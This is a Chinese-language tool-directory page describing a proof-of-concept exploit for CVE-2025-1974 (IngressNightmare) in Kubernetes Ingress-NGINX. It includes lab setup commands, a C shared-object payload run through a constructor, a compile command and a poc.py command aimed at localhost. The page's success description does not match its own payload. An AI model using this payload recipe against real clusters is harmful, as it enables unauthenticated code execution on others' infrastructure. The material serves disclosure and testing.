Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-1974 — 针对 CVE-2025-1974 (IngressNightmare) 的概念验证漏洞利用程序,针对 Kubernetes Ingress-NGINX 准入控制器,通过恶意 AdmissionReview 请求实现远程代码执行。 | Kitploit
工具/GitHubGitHub/chhhd/cve-2025-1974
容器安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试云安全远程访问工具Payload 开发
GitHubchhhd/cve-2025-1974

CVE-2025-1974

针对 CVE-2025-1974 (IngressNightmare) 的概念验证漏洞利用程序,针对 Kubernetes Ingress-NGINX 准入控制器,通过恶意 AdmissionReview 请求实现远程代码执行。

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Kubernetes Ingress-NGINX 未认证远程代码执行(CVE-2025-1974)

Ingress-NGINX: 使用NGINX作为反向代理和负载均衡器的Kubernetes ingress控制器

"IngressNightmare"漏洞(CVE-2025-1974)源于Ingress-NGINX Admission Controller的致命缺陷,该控制器是Kubernetes用于验证传入Ingress资源的核心安全机制。

该控制器在没有认证的情况下暴露于网络,使攻击者能够操纵恶意的AdmissionReview请求,并在Ingress资源中插入未授权的配置。

与其他漏洞(CVE-2025-24514, CVE-2024-1097 或 CVE-2025-1098)结合时,可能导致远程代码执行。

一些可利用的链如下:

CVE-2025-1974+CVE-2025-24514: 通过auth-url注释注入实现RCE

CVE-2025-1974+CVE-2025-1097: 通过auth-tls-match-cn注释实现RCE

CVE-2025-1974+CVE-2025-1098: 通过滥用镜像UID实现RCE

环境设置

为了模拟漏洞,出于简单性考虑,使用了基于K3s的Kubernetes环境

root@kitploit:~
docker compose up -d

等待Kubernetes API就绪并且Ingress-nginx控制器启动。 环境启动后,Ingress-NGINX在端口30080和30443(TLS)上监听,而Ingress-NGINX Admission Controller则在端口30443上。

执行过程

.so 首先,需要编译与容器架构匹配的共享对象( )载荷。

root@kitploit:~
#include<stdio.h>
#include<stdlib.h>

__attribute__((constructor)) static void reverse_shell(void)
{
    system("touch /tmp/hacked");
}
  1. 编译源代码
root@kitploit:~
gcc -shared -fPIC -o shell.so shell.c
  1. 在适当的环境中编译上述源代码后,使用exploit.py利用漏洞
root@kitploit:~
python3 poc.py -a https://localhost:30443/networking/v1/ingresses -i http://localhost:30080/fake/addr -s shell.so

AdmissionReview 漏洞利用通过伪造指令注入请求,迫使NGINX加载恶意的动态共享对象,从而起作用。

如果漏洞利用成功,可以在ingress-nginx容器内部看到创建了ssl_engine文件。

image

下载工具